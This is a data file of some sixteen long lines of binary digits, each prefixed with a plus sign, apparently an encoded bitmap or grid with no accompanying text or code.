+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111110000100000000000110011001111111100000000000001110111111111110000100000010000000000001101111010000000000000000000110111101000000000000001011110111101111010000000000011111111110111101000000000000001011110111101111010000000000011111111110111101000000000000001011110111101111010000000000000000000110111101000000000000001011110110011111110000000000000000000000000000000000000000000000000000000000000000000000000001101101011110111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000110111100101010100000000000000100010000000000000100000010000111111110010110110000000000000000000001011011000000000000001101101000010110110000000000011111111001011011000000000000001101101000010110110000000000011111111001011011000000000000001101101000010110110000000000000000000001011011000000000000001101101000011111110000000000000000000000000000000000000000000000000000000000000000000000000001111101101101101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101010100001000000000000110011110011001100000000000000011101110011000001000000001000000011111111111110000000000000000000001011011000000000000001101101000010110110000000000011111111001011011000000000000001101101000010110110000000000011111111001011011000000000000001101101000010110110000000000000000000001011011000000000000001101101000010110110000000000000000000000000000000000000000000000000000000000000000000000000001111101110010010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101010100000000000000000111011100111011100000000000011111111110011000000000000000000000011111111111110000000000000000000110111101000000000000001011110111101111010000000000010111111110111101000000000000001011110111101111010000000000010111111110111101000000000000001011110111101111010000000000000000000110111101000000000000001011110111101111010000000000000000000000000000000000000000000000000000000000000000000000000000000011000001000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000000110000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000110000000000000000000000000000000000000000000000000110000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000110000000110000000000000000000000001100000000000000000011001110000000110000000000000000000000000011000000000000000000000110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011110000001100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000001000000000000000000000000100000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111110111000001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000100000000000000000000000000000000000000000000000000000001000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000100000000000000000000000000000000000000000000000000000000000000001001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000000000000000000000000000000000000000000000000000001000100001001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000100001001000000000000000000000000000000000000000000000001000100001000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000001000100001001000000000000000000000100000000000000000000000001001000001001000000000000000000000000000000000000000000000001010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000001010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100001100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000001100000000000000010000000000000000000000000000100110110100110000110000000000000000000000000000000000000000000000000000001100000000000000001101100000000000000000000000011000000000000011001000000000000000000000000000000000000000000000000000000000000000000000000000001001001100110101111111111111111111111111111111111111111111111111 +111100001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000010000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000001000000000000000000001001000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111101001100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000001000000100001010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111000011111000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000001000000000000000000001001000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000100001011100001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000100100000000000000000000000000000000011000000011000000000110111100011100000001111000000000000001110000000111100000000110111100111100000001111010101000000001110000100111100000000110111100011110010001111000000000000001110000000111100010000110111100100100000001110000000000000000000000000000000000000000011000110000000001100000000000000000000000000000000000000000000000000000000000000000000001101101011011111111111111111111111111111111111111111111111111111 +111100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000001000000000000000000010100000000100000000000000000000000000001000000000000000000010100000000100000000100000000000000000001000000000000000000110000010000010000000000000000000000000001000000000000000000010000000000000000000000000000000000000000000000000000000101000100000000000010000000000000000000000000000000000000000000000000000000000000000000001100001101000100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010010000000000000000000000000000000000000000000000000010000000110000000000000100000000000000010101000000100000000010000000110000100000000100000000000000010100000000100000000010000010001000000100000101000000000000010100000000100000001010000000110100000000000101000000000000000000000000000000000000000000000001000000000100000000000000000000000000000000000000000000000000000000000000000000000010110101100000111111111111111111111111111111111111111111111111 